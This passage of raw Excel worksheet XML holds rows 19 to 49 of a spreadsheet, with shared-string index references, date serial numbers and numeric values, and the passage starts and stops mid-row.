      <c r="C19" t="s">
        <v>468</v>
      </c>
      <c r="D19">
        <v>210</v>
      </c>
      <c r="E19" t="s">
        <v>469</v>
      </c>
      <c r="F19">
        <v>210</v>
      </c>
      <c r="G19" t="s">
        <v>470</v>
      </c>
      <c r="H19" t="s">
        <v>471</v>
      </c>
      <c r="I19" t="s">
        <v>103</v>
      </c>
      <c r="J19" t="s">
        <v>104</v>
      </c>
      <c r="K19" t="s">
        <v>19</v>
      </c>
      <c r="L19" t="s">
        <v>77</v>
      </c>
      <c r="M19" t="s">
        <v>104</v>
      </c>
      <c r="P19" t="s">
        <v>472</v>
      </c>
      <c r="Q19" t="s">
        <v>3636</v>
      </c>
      <c r="R19">
        <v>1260</v>
      </c>
      <c r="S19">
        <v>427</v>
      </c>
      <c r="W19" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="20" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>3</v>
      </c>
      <c r="B20">
        <v>43665.050422754626</v>
      </c>
      <c r="C20" t="s">
        <v>468</v>
      </c>
      <c r="D20">
        <v>210</v>
      </c>
      <c r="E20" t="s">
        <v>479</v>
      </c>
      <c r="F20">
        <v>110</v>
      </c>
      <c r="G20" t="s">
        <v>480</v>
      </c>
      <c r="H20" t="s">
        <v>481</v>
      </c>
      <c r="I20" t="s">
        <v>103</v>
      </c>
      <c r="J20" t="s">
        <v>104</v>
      </c>
      <c r="K20" t="s">
        <v>19</v>
      </c>
      <c r="L20" t="s">
        <v>77</v>
      </c>
      <c r="M20" t="s">
        <v>104</v>
      </c>
      <c r="O20" t="s">
        <v>482</v>
      </c>
      <c r="Q20" t="s">
        <v>3636</v>
      </c>
      <c r="W20" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="21" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A21" t="s">
        <v>3</v>
      </c>
      <c r="B21">
        <v>43665.050422743057</v>
      </c>
      <c r="C21" t="s">
        <v>468</v>
      </c>
      <c r="D21">
        <v>210</v>
      </c>
      <c r="E21" t="s">
        <v>483</v>
      </c>
      <c r="F21">
        <v>110</v>
      </c>
      <c r="G21" t="s">
        <v>484</v>
      </c>
      <c r="H21" t="s">
        <v>485</v>
      </c>
      <c r="I21" t="s">
        <v>103</v>
      </c>
      <c r="J21" t="s">
        <v>104</v>
      </c>
      <c r="K21" t="s">
        <v>19</v>
      </c>
      <c r="L21" t="s">
        <v>77</v>
      </c>
      <c r="M21" t="s">
        <v>104</v>
      </c>
      <c r="O21" t="s">
        <v>486</v>
      </c>
      <c r="Q21" t="s">
        <v>3636</v>
      </c>
      <c r="W21" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="22" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A22" t="s">
        <v>3</v>
      </c>
      <c r="B22">
        <v>44007.689696863425</v>
      </c>
      <c r="C22" t="s">
        <v>1115</v>
      </c>
      <c r="D22">
        <v>103</v>
      </c>
      <c r="E22" t="s">
        <v>1116</v>
      </c>
      <c r="F22">
        <v>102</v>
      </c>
      <c r="G22" t="s">
        <v>1117</v>
      </c>
      <c r="H22" t="s">
        <v>1118</v>
      </c>
      <c r="I22" t="s">
        <v>103</v>
      </c>
      <c r="J22" t="s">
        <v>104</v>
      </c>
      <c r="K22" t="s">
        <v>19</v>
      </c>
      <c r="L22" t="s">
        <v>77</v>
      </c>
      <c r="M22" t="s">
        <v>104</v>
      </c>
      <c r="O22" t="s">
        <v>1119</v>
      </c>
      <c r="Q22" t="s">
        <v>3637</v>
      </c>
      <c r="R22">
        <v>737</v>
      </c>
      <c r="S22">
        <v>686</v>
      </c>
      <c r="W22" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="23" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A23" t="s">
        <v>3</v>
      </c>
      <c r="B23">
        <v>44131.418110219907</v>
      </c>
      <c r="C23" t="s">
        <v>1192</v>
      </c>
      <c r="D23">
        <v>113</v>
      </c>
      <c r="E23" t="s">
        <v>1209</v>
      </c>
      <c r="F23">
        <v>103</v>
      </c>
      <c r="G23" t="s">
        <v>1210</v>
      </c>
      <c r="H23" t="s">
        <v>1211</v>
      </c>
      <c r="I23" t="s">
        <v>103</v>
      </c>
      <c r="J23" t="s">
        <v>104</v>
      </c>
      <c r="K23" t="s">
        <v>19</v>
      </c>
      <c r="L23" t="s">
        <v>77</v>
      </c>
      <c r="M23" t="s">
        <v>104</v>
      </c>
      <c r="O23" t="s">
        <v>1212</v>
      </c>
      <c r="Q23" t="s">
        <v>3638</v>
      </c>
      <c r="R23">
        <v>291</v>
      </c>
      <c r="S23">
        <v>237</v>
      </c>
      <c r="W23" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="24" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A24" t="s">
        <v>3</v>
      </c>
      <c r="B24">
        <v>44005.711249849533</v>
      </c>
      <c r="C24" t="s">
        <v>1192</v>
      </c>
      <c r="D24">
        <v>113</v>
      </c>
      <c r="E24" t="s">
        <v>1216</v>
      </c>
      <c r="F24">
        <v>112</v>
      </c>
      <c r="G24" t="s">
        <v>1217</v>
      </c>
      <c r="H24" t="s">
        <v>1218</v>
      </c>
      <c r="I24" t="s">
        <v>103</v>
      </c>
      <c r="J24" t="s">
        <v>104</v>
      </c>
      <c r="K24" t="s">
        <v>19</v>
      </c>
      <c r="L24" t="s">
        <v>77</v>
      </c>
      <c r="M24" t="s">
        <v>104</v>
      </c>
      <c r="O24" t="s">
        <v>1219</v>
      </c>
      <c r="Q24" t="s">
        <v>3638</v>
      </c>
      <c r="W24" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="25" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A25" t="s">
        <v>3</v>
      </c>
      <c r="B25">
        <v>43566.650861203707</v>
      </c>
      <c r="C25" t="s">
        <v>1240</v>
      </c>
      <c r="D25">
        <v>110</v>
      </c>
      <c r="E25" t="s">
        <v>1241</v>
      </c>
      <c r="F25">
        <v>110</v>
      </c>
      <c r="G25" t="s">
        <v>1242</v>
      </c>
      <c r="H25" t="s">
        <v>1243</v>
      </c>
      <c r="I25" t="s">
        <v>611</v>
      </c>
      <c r="J25" t="s">
        <v>612</v>
      </c>
      <c r="K25" t="s">
        <v>14</v>
      </c>
      <c r="L25" t="s">
        <v>77</v>
      </c>
      <c r="M25" t="s">
        <v>612</v>
      </c>
      <c r="N25" t="s">
        <v>613</v>
      </c>
      <c r="O25" t="s">
        <v>1244</v>
      </c>
      <c r="Q25" t="s">
        <v>3639</v>
      </c>
      <c r="R25">
        <v>56452</v>
      </c>
      <c r="S25">
        <v>55858</v>
      </c>
      <c r="W25" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="26" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A26" t="s">
        <v>3</v>
      </c>
      <c r="B26">
        <v>43566.596765949071</v>
      </c>
      <c r="C26" t="s">
        <v>1536</v>
      </c>
      <c r="D26">
        <v>110</v>
      </c>
      <c r="E26" t="s">
        <v>1537</v>
      </c>
      <c r="F26">
        <v>110</v>
      </c>
      <c r="G26" t="s">
        <v>1538</v>
      </c>
      <c r="H26" t="s">
        <v>1539</v>
      </c>
      <c r="I26" t="s">
        <v>103</v>
      </c>
      <c r="J26" t="s">
        <v>104</v>
      </c>
      <c r="K26" t="s">
        <v>19</v>
      </c>
      <c r="L26" t="s">
        <v>77</v>
      </c>
      <c r="M26" t="s">
        <v>104</v>
      </c>
      <c r="O26" t="s">
        <v>1540</v>
      </c>
      <c r="Q26" t="s">
        <v>3640</v>
      </c>
      <c r="R26">
        <v>4113</v>
      </c>
      <c r="S26">
        <v>2526</v>
      </c>
      <c r="W26" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="27" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A27" t="s">
        <v>3</v>
      </c>
      <c r="B27">
        <v>44314.92263760417</v>
      </c>
      <c r="C27" t="s">
        <v>1536</v>
      </c>
      <c r="D27">
        <v>231</v>
      </c>
      <c r="E27" t="s">
        <v>1537</v>
      </c>
      <c r="F27">
        <v>120</v>
      </c>
      <c r="G27" t="s">
        <v>1538</v>
      </c>
      <c r="H27" t="s">
        <v>1539</v>
      </c>
      <c r="I27" t="s">
        <v>103</v>
      </c>
      <c r="J27" t="s">
        <v>104</v>
      </c>
      <c r="K27" t="s">
        <v>19</v>
      </c>
      <c r="L27" t="s">
        <v>77</v>
      </c>
      <c r="M27" t="s">
        <v>104</v>
      </c>
      <c r="O27" t="s">
        <v>105</v>
      </c>
      <c r="Q27" t="s">
        <v>3641</v>
      </c>
      <c r="R27">
        <v>31036</v>
      </c>
      <c r="S27">
        <v>31787</v>
      </c>
      <c r="W27" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="28" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A28" t="s">
        <v>3</v>
      </c>
      <c r="B28">
        <v>44314.92263760417</v>
      </c>
      <c r="C28" t="s">
        <v>1536</v>
      </c>
      <c r="D28">
        <v>310</v>
      </c>
      <c r="E28" t="s">
        <v>1537</v>
      </c>
      <c r="F28">
        <v>200</v>
      </c>
      <c r="G28" t="s">
        <v>1538</v>
      </c>
      <c r="H28" t="s">
        <v>1539</v>
      </c>
      <c r="I28" t="s">
        <v>103</v>
      </c>
      <c r="J28" t="s">
        <v>104</v>
      </c>
      <c r="K28" t="s">
        <v>19</v>
      </c>
      <c r="L28" t="s">
        <v>77</v>
      </c>
      <c r="M28" t="s">
        <v>104</v>
      </c>
      <c r="O28" t="s">
        <v>105</v>
      </c>
      <c r="Q28" t="s">
        <v>142</v>
      </c>
      <c r="W28" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="29" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A29" t="s">
        <v>3</v>
      </c>
      <c r="B29">
        <v>43566.596766041665</v>
      </c>
      <c r="C29" t="s">
        <v>1536</v>
      </c>
      <c r="D29">
        <v>110</v>
      </c>
      <c r="E29" t="s">
        <v>1543</v>
      </c>
      <c r="F29">
        <v>110</v>
      </c>
      <c r="G29" t="s">
        <v>1544</v>
      </c>
      <c r="H29" t="s">
        <v>1545</v>
      </c>
      <c r="I29" t="s">
        <v>103</v>
      </c>
      <c r="J29" t="s">
        <v>104</v>
      </c>
      <c r="K29" t="s">
        <v>19</v>
      </c>
      <c r="L29" t="s">
        <v>77</v>
      </c>
      <c r="M29" t="s">
        <v>104</v>
      </c>
      <c r="O29" t="s">
        <v>1540</v>
      </c>
      <c r="Q29" t="s">
        <v>3640</v>
      </c>
      <c r="W29" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="30" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A30" t="s">
        <v>3</v>
      </c>
      <c r="B30">
        <v>44349.88022298611</v>
      </c>
      <c r="C30" t="s">
        <v>1536</v>
      </c>
      <c r="D30">
        <v>231</v>
      </c>
      <c r="E30" t="s">
        <v>1543</v>
      </c>
      <c r="F30">
        <v>201</v>
      </c>
      <c r="G30" t="s">
        <v>1544</v>
      </c>
      <c r="H30" t="s">
        <v>1545</v>
      </c>
      <c r="I30" t="s">
        <v>103</v>
      </c>
      <c r="J30" t="s">
        <v>104</v>
      </c>
      <c r="K30" t="s">
        <v>19</v>
      </c>
      <c r="L30" t="s">
        <v>77</v>
      </c>
      <c r="M30" t="s">
        <v>104</v>
      </c>
      <c r="O30" t="s">
        <v>1546</v>
      </c>
      <c r="Q30" t="s">
        <v>3641</v>
      </c>
      <c r="R30">
        <v>3051</v>
      </c>
      <c r="S30">
        <v>405</v>
      </c>
      <c r="W30" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="31" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A31" t="s">
        <v>3</v>
      </c>
      <c r="B31">
        <v>44349.88022298611</v>
      </c>
      <c r="C31" t="s">
        <v>1536</v>
      </c>
      <c r="D31">
        <v>310</v>
      </c>
      <c r="E31" t="s">
        <v>1543</v>
      </c>
      <c r="F31">
        <v>310</v>
      </c>
      <c r="G31" t="s">
        <v>1544</v>
      </c>
      <c r="H31" t="s">
        <v>1545</v>
      </c>
      <c r="I31" t="s">
        <v>103</v>
      </c>
      <c r="J31" t="s">
        <v>104</v>
      </c>
      <c r="K31" t="s">
        <v>19</v>
      </c>
      <c r="L31" t="s">
        <v>77</v>
      </c>
      <c r="M31" t="s">
        <v>104</v>
      </c>
      <c r="O31" t="s">
        <v>1546</v>
      </c>
      <c r="Q31" t="s">
        <v>142</v>
      </c>
      <c r="W31" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="32" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A32" t="s">
        <v>3</v>
      </c>
      <c r="B32">
        <v>43566.596765983799</v>
      </c>
      <c r="C32" t="s">
        <v>1536</v>
      </c>
      <c r="D32">
        <v>110</v>
      </c>
      <c r="E32" t="s">
        <v>1547</v>
      </c>
      <c r="F32">
        <v>110</v>
      </c>
      <c r="G32" t="s">
        <v>1548</v>
      </c>
      <c r="H32" t="s">
        <v>1549</v>
      </c>
      <c r="I32" t="s">
        <v>103</v>
      </c>
      <c r="J32" t="s">
        <v>104</v>
      </c>
      <c r="K32" t="s">
        <v>19</v>
      </c>
      <c r="L32" t="s">
        <v>77</v>
      </c>
      <c r="M32" t="s">
        <v>104</v>
      </c>
      <c r="O32" t="s">
        <v>1550</v>
      </c>
      <c r="Q32" t="s">
        <v>3640</v>
      </c>
      <c r="W32" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="33" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A33" t="s">
        <v>3</v>
      </c>
      <c r="B33">
        <v>44349.880223009262</v>
      </c>
      <c r="C33" t="s">
        <v>1536</v>
      </c>
      <c r="D33">
        <v>231</v>
      </c>
      <c r="E33" t="s">
        <v>1547</v>
      </c>
      <c r="F33">
        <v>211</v>
      </c>
      <c r="G33" t="s">
        <v>1548</v>
      </c>
      <c r="H33" t="s">
        <v>1549</v>
      </c>
      <c r="I33" t="s">
        <v>103</v>
      </c>
      <c r="J33" t="s">
        <v>104</v>
      </c>
      <c r="K33" t="s">
        <v>19</v>
      </c>
      <c r="L33" t="s">
        <v>77</v>
      </c>
      <c r="M33" t="s">
        <v>104</v>
      </c>
      <c r="O33" t="s">
        <v>1550</v>
      </c>
      <c r="Q33" t="s">
        <v>3641</v>
      </c>
      <c r="R33">
        <v>445</v>
      </c>
      <c r="S33">
        <v>515</v>
      </c>
      <c r="W33" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="34" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A34" t="s">
        <v>3</v>
      </c>
      <c r="B34">
        <v>44349.880223009262</v>
      </c>
      <c r="C34" t="s">
        <v>1536</v>
      </c>
      <c r="D34">
        <v>310</v>
      </c>
      <c r="E34" t="s">
        <v>1547</v>
      </c>
      <c r="F34">
        <v>220</v>
      </c>
      <c r="G34" t="s">
        <v>1548</v>
      </c>
      <c r="H34" t="s">
        <v>1549</v>
      </c>
      <c r="I34" t="s">
        <v>103</v>
      </c>
      <c r="J34" t="s">
        <v>104</v>
      </c>
      <c r="K34" t="s">
        <v>19</v>
      </c>
      <c r="L34" t="s">
        <v>77</v>
      </c>
      <c r="M34" t="s">
        <v>104</v>
      </c>
      <c r="O34" t="s">
        <v>1550</v>
      </c>
      <c r="Q34" t="s">
        <v>142</v>
      </c>
      <c r="W34" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="35" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A35" t="s">
        <v>3</v>
      </c>
      <c r="B35">
        <v>43566.596766006944</v>
      </c>
      <c r="C35" t="s">
        <v>1536</v>
      </c>
      <c r="D35">
        <v>110</v>
      </c>
      <c r="E35" t="s">
        <v>1551</v>
      </c>
      <c r="F35">
        <v>110</v>
      </c>
      <c r="G35" t="s">
        <v>1552</v>
      </c>
      <c r="H35" t="s">
        <v>1553</v>
      </c>
      <c r="I35" t="s">
        <v>103</v>
      </c>
      <c r="J35" t="s">
        <v>104</v>
      </c>
      <c r="K35" t="s">
        <v>19</v>
      </c>
      <c r="L35" t="s">
        <v>77</v>
      </c>
      <c r="M35" t="s">
        <v>104</v>
      </c>
      <c r="O35" t="s">
        <v>1554</v>
      </c>
      <c r="Q35" t="s">
        <v>3640</v>
      </c>
      <c r="R35">
        <v>2358</v>
      </c>
      <c r="S35">
        <v>953</v>
      </c>
      <c r="W35" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="36" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A36" t="s">
        <v>3</v>
      </c>
      <c r="B36">
        <v>44314.922637638891</v>
      </c>
      <c r="C36" t="s">
        <v>1536</v>
      </c>
      <c r="D36">
        <v>231</v>
      </c>
      <c r="E36" t="s">
        <v>1551</v>
      </c>
      <c r="F36">
        <v>120</v>
      </c>
      <c r="G36" t="s">
        <v>1552</v>
      </c>
      <c r="H36" t="s">
        <v>1553</v>
      </c>
      <c r="I36" t="s">
        <v>103</v>
      </c>
      <c r="J36" t="s">
        <v>104</v>
      </c>
      <c r="K36" t="s">
        <v>19</v>
      </c>
      <c r="L36" t="s">
        <v>77</v>
      </c>
      <c r="M36" t="s">
        <v>104</v>
      </c>
      <c r="O36" t="s">
        <v>1554</v>
      </c>
      <c r="Q36" t="s">
        <v>3641</v>
      </c>
      <c r="W36" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="37" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A37" t="s">
        <v>3</v>
      </c>
      <c r="B37">
        <v>44314.922637638891</v>
      </c>
      <c r="C37" t="s">
        <v>1536</v>
      </c>
      <c r="D37">
        <v>310</v>
      </c>
      <c r="E37" t="s">
        <v>1551</v>
      </c>
      <c r="F37">
        <v>200</v>
      </c>
      <c r="G37" t="s">
        <v>1552</v>
      </c>
      <c r="H37" t="s">
        <v>1553</v>
      </c>
      <c r="I37" t="s">
        <v>103</v>
      </c>
      <c r="J37" t="s">
        <v>104</v>
      </c>
      <c r="K37" t="s">
        <v>19</v>
      </c>
      <c r="L37" t="s">
        <v>77</v>
      </c>
      <c r="M37" t="s">
        <v>104</v>
      </c>
      <c r="O37" t="s">
        <v>1554</v>
      </c>
      <c r="Q37" t="s">
        <v>142</v>
      </c>
      <c r="W37" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="38" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A38" t="s">
        <v>3</v>
      </c>
      <c r="B38">
        <v>43566.596766030096</v>
      </c>
      <c r="C38" t="s">
        <v>1536</v>
      </c>
      <c r="D38">
        <v>110</v>
      </c>
      <c r="E38" t="s">
        <v>1555</v>
      </c>
      <c r="F38">
        <v>110</v>
      </c>
      <c r="G38" t="s">
        <v>1556</v>
      </c>
      <c r="H38" t="s">
        <v>1557</v>
      </c>
      <c r="I38" t="s">
        <v>103</v>
      </c>
      <c r="J38" t="s">
        <v>104</v>
      </c>
      <c r="K38" t="s">
        <v>19</v>
      </c>
      <c r="L38" t="s">
        <v>77</v>
      </c>
      <c r="M38" t="s">
        <v>104</v>
      </c>
      <c r="O38" t="s">
        <v>1554</v>
      </c>
      <c r="Q38" t="s">
        <v>3640</v>
      </c>
      <c r="R38">
        <v>1</v>
      </c>
      <c r="W38" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="39" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A39" t="s">
        <v>3</v>
      </c>
      <c r="B39">
        <v>43566.596766030096</v>
      </c>
      <c r="C39" t="s">
        <v>1536</v>
      </c>
      <c r="D39">
        <v>231</v>
      </c>
      <c r="E39" t="s">
        <v>1555</v>
      </c>
      <c r="F39">
        <v>110</v>
      </c>
      <c r="G39" t="s">
        <v>1556</v>
      </c>
      <c r="H39" t="s">
        <v>1557</v>
      </c>
      <c r="I39" t="s">
        <v>103</v>
      </c>
      <c r="J39" t="s">
        <v>104</v>
      </c>
      <c r="K39" t="s">
        <v>19</v>
      </c>
      <c r="L39" t="s">
        <v>77</v>
      </c>
      <c r="M39" t="s">
        <v>104</v>
      </c>
      <c r="O39" t="s">
        <v>1554</v>
      </c>
      <c r="Q39" t="s">
        <v>3641</v>
      </c>
      <c r="R39">
        <v>1</v>
      </c>
      <c r="W39" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="40" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A40" t="s">
        <v>3</v>
      </c>
      <c r="B40">
        <v>43566.596766030096</v>
      </c>
      <c r="C40" t="s">
        <v>1536</v>
      </c>
      <c r="D40">
        <v>310</v>
      </c>
      <c r="E40" t="s">
        <v>1555</v>
      </c>
      <c r="F40">
        <v>110</v>
      </c>
      <c r="G40" t="s">
        <v>1556</v>
      </c>
      <c r="H40" t="s">
        <v>1557</v>
      </c>
      <c r="I40" t="s">
        <v>103</v>
      </c>
      <c r="J40" t="s">
        <v>104</v>
      </c>
      <c r="K40" t="s">
        <v>19</v>
      </c>
      <c r="L40" t="s">
        <v>77</v>
      </c>
      <c r="M40" t="s">
        <v>104</v>
      </c>
      <c r="O40" t="s">
        <v>1554</v>
      </c>
      <c r="Q40" t="s">
        <v>142</v>
      </c>
      <c r="R40">
        <v>1</v>
      </c>
      <c r="W40" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="41" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A41" t="s">
        <v>3</v>
      </c>
      <c r="B41">
        <v>44327.625929131944</v>
      </c>
      <c r="C41" t="s">
        <v>1739</v>
      </c>
      <c r="D41">
        <v>110</v>
      </c>
      <c r="E41" t="s">
        <v>1740</v>
      </c>
      <c r="F41">
        <v>110</v>
      </c>
      <c r="G41" t="s">
        <v>1741</v>
      </c>
      <c r="H41" t="s">
        <v>1742</v>
      </c>
      <c r="I41" t="s">
        <v>103</v>
      </c>
      <c r="J41" t="s">
        <v>104</v>
      </c>
      <c r="K41" t="s">
        <v>19</v>
      </c>
      <c r="L41" t="s">
        <v>77</v>
      </c>
      <c r="M41" t="s">
        <v>104</v>
      </c>
      <c r="O41" t="s">
        <v>1743</v>
      </c>
      <c r="Q41" t="s">
        <v>3642</v>
      </c>
      <c r="R41">
        <v>672</v>
      </c>
      <c r="S41">
        <v>1</v>
      </c>
      <c r="W41" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="42" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A42" t="s">
        <v>3</v>
      </c>
      <c r="B42">
        <v>44130.664220289349</v>
      </c>
      <c r="C42" t="s">
        <v>2320</v>
      </c>
      <c r="D42">
        <v>100</v>
      </c>
      <c r="E42" t="s">
        <v>2321</v>
      </c>
      <c r="F42">
        <v>100</v>
      </c>
      <c r="G42" t="s">
        <v>2322</v>
      </c>
      <c r="H42" t="s">
        <v>2323</v>
      </c>
      <c r="I42" t="s">
        <v>103</v>
      </c>
      <c r="J42" t="s">
        <v>104</v>
      </c>
      <c r="K42" t="s">
        <v>19</v>
      </c>
      <c r="L42" t="s">
        <v>77</v>
      </c>
      <c r="M42" t="s">
        <v>104</v>
      </c>
      <c r="O42" t="s">
        <v>2324</v>
      </c>
      <c r="Q42" t="s">
        <v>142</v>
      </c>
      <c r="W42" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="43" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A43" t="s">
        <v>3</v>
      </c>
      <c r="B43">
        <v>44061.968377083336</v>
      </c>
      <c r="C43" t="s">
        <v>2598</v>
      </c>
      <c r="D43">
        <v>114</v>
      </c>
      <c r="E43" t="s">
        <v>2974</v>
      </c>
      <c r="F43">
        <v>114</v>
      </c>
      <c r="G43" t="s">
        <v>2975</v>
      </c>
      <c r="H43" t="s">
        <v>2976</v>
      </c>
      <c r="I43" t="s">
        <v>103</v>
      </c>
      <c r="J43" t="s">
        <v>104</v>
      </c>
      <c r="K43" t="s">
        <v>19</v>
      </c>
      <c r="L43" t="s">
        <v>77</v>
      </c>
      <c r="M43" t="s">
        <v>104</v>
      </c>
      <c r="Q43" t="s">
        <v>3643</v>
      </c>
      <c r="W43" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="44" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A44" t="s">
        <v>3</v>
      </c>
      <c r="B44">
        <v>43775.748652488423</v>
      </c>
      <c r="C44" t="s">
        <v>3280</v>
      </c>
      <c r="D44">
        <v>100</v>
      </c>
      <c r="E44" t="s">
        <v>3281</v>
      </c>
      <c r="F44">
        <v>100</v>
      </c>
      <c r="G44" t="s">
        <v>3282</v>
      </c>
      <c r="H44" t="s">
        <v>3283</v>
      </c>
      <c r="I44" t="s">
        <v>38</v>
      </c>
      <c r="J44" t="s">
        <v>38</v>
      </c>
      <c r="K44" t="s">
        <v>38</v>
      </c>
      <c r="L44" t="s">
        <v>38</v>
      </c>
      <c r="M44" t="s">
        <v>38</v>
      </c>
      <c r="N44" t="s">
        <v>38</v>
      </c>
      <c r="O44" t="s">
        <v>3284</v>
      </c>
      <c r="Q44" t="s">
        <v>3644</v>
      </c>
      <c r="R44">
        <v>701</v>
      </c>
      <c r="S44">
        <v>736</v>
      </c>
      <c r="W44" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="45" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A45" t="s">
        <v>3</v>
      </c>
      <c r="B45">
        <v>43775.748652476854</v>
      </c>
      <c r="C45" t="s">
        <v>3280</v>
      </c>
      <c r="D45">
        <v>100</v>
      </c>
      <c r="E45" t="s">
        <v>3286</v>
      </c>
      <c r="F45">
        <v>100</v>
      </c>
      <c r="G45" t="s">
        <v>3287</v>
      </c>
      <c r="H45" t="s">
        <v>3288</v>
      </c>
      <c r="I45" t="s">
        <v>38</v>
      </c>
      <c r="J45" t="s">
        <v>38</v>
      </c>
      <c r="K45" t="s">
        <v>38</v>
      </c>
      <c r="L45" t="s">
        <v>38</v>
      </c>
      <c r="M45" t="s">
        <v>38</v>
      </c>
      <c r="N45" t="s">
        <v>38</v>
      </c>
      <c r="O45" t="s">
        <v>3289</v>
      </c>
      <c r="Q45" t="s">
        <v>3644</v>
      </c>
      <c r="R45">
        <v>282</v>
      </c>
      <c r="S45">
        <v>350</v>
      </c>
      <c r="W45" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="46" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A46" t="s">
        <v>3</v>
      </c>
      <c r="B46">
        <v>44098.935999849535</v>
      </c>
      <c r="C46" t="s">
        <v>3348</v>
      </c>
      <c r="D46">
        <v>102</v>
      </c>
      <c r="E46" t="s">
        <v>3349</v>
      </c>
      <c r="F46">
        <v>102</v>
      </c>
      <c r="G46" t="s">
        <v>3350</v>
      </c>
      <c r="H46" t="s">
        <v>3351</v>
      </c>
      <c r="I46" t="s">
        <v>268</v>
      </c>
      <c r="J46" t="s">
        <v>269</v>
      </c>
      <c r="K46" t="s">
        <v>10</v>
      </c>
      <c r="L46" t="s">
        <v>77</v>
      </c>
      <c r="M46" t="s">
        <v>1766</v>
      </c>
      <c r="N46" t="s">
        <v>1767</v>
      </c>
      <c r="P46" t="s">
        <v>604</v>
      </c>
      <c r="Q46" t="s">
        <v>3645</v>
      </c>
      <c r="W46" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="47" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A47" t="s">
        <v>3</v>
      </c>
      <c r="B47">
        <v>44098.935999849535</v>
      </c>
      <c r="C47" t="s">
        <v>3348</v>
      </c>
      <c r="D47">
        <v>200</v>
      </c>
      <c r="E47" t="s">
        <v>3349</v>
      </c>
      <c r="F47">
        <v>200</v>
      </c>
      <c r="G47" t="s">
        <v>3350</v>
      </c>
      <c r="H47" t="s">
        <v>3351</v>
      </c>
      <c r="I47" t="s">
        <v>268</v>
      </c>
      <c r="J47" t="s">
        <v>269</v>
      </c>
      <c r="K47" t="s">
        <v>10</v>
      </c>
      <c r="L47" t="s">
        <v>77</v>
      </c>
      <c r="M47" t="s">
        <v>1766</v>
      </c>
      <c r="N47" t="s">
        <v>1767</v>
      </c>
      <c r="P47" t="s">
        <v>604</v>
      </c>
      <c r="Q47" t="s">
        <v>3353</v>
      </c>
      <c r="R47">
        <v>11043</v>
      </c>
      <c r="S47">
        <v>10795</v>
      </c>
      <c r="W47" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="48" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A48" t="s">
        <v>3</v>
      </c>
      <c r="B48">
        <v>44057.694567280094</v>
      </c>
      <c r="C48" t="s">
        <v>3374</v>
      </c>
      <c r="D48">
        <v>101</v>
      </c>
      <c r="E48" t="s">
        <v>3375</v>
      </c>
      <c r="F48">
        <v>100</v>
      </c>
      <c r="G48" t="s">
        <v>3376</v>
      </c>
      <c r="H48" t="s">
        <v>3377</v>
      </c>
      <c r="I48" t="s">
        <v>103</v>
      </c>
      <c r="J48" t="s">
        <v>104</v>
      </c>
      <c r="K48" t="s">
        <v>19</v>
      </c>
      <c r="L48" t="s">
        <v>77</v>
      </c>
      <c r="M48" t="s">
        <v>104</v>
      </c>
      <c r="O48" t="s">
        <v>3378</v>
      </c>
      <c r="Q48" t="s">
        <v>3379</v>
      </c>
      <c r="W48" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="49" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A49" t="s">
        <v>3</v>
      </c>
      <c r="B49">
        <v>43946.014389328702</v>
      </c>
      <c r="C49" t="s">
        <v>2075</v>
      </c>
      <c r="D49">
        <v>106</v>
      </c>
      <c r="E49" t="s">
        <v>2076</v>
      </c>
      <c r="F49">
        <v>106</v>
      </c>
      <c r="G49" t="s">
        <v>2077</v>
      </c>
      <c r="H49" t="s">
        <v>2078</v>
      </c>
      <c r="I49" t="s">
        <v>156</v>
      </c>
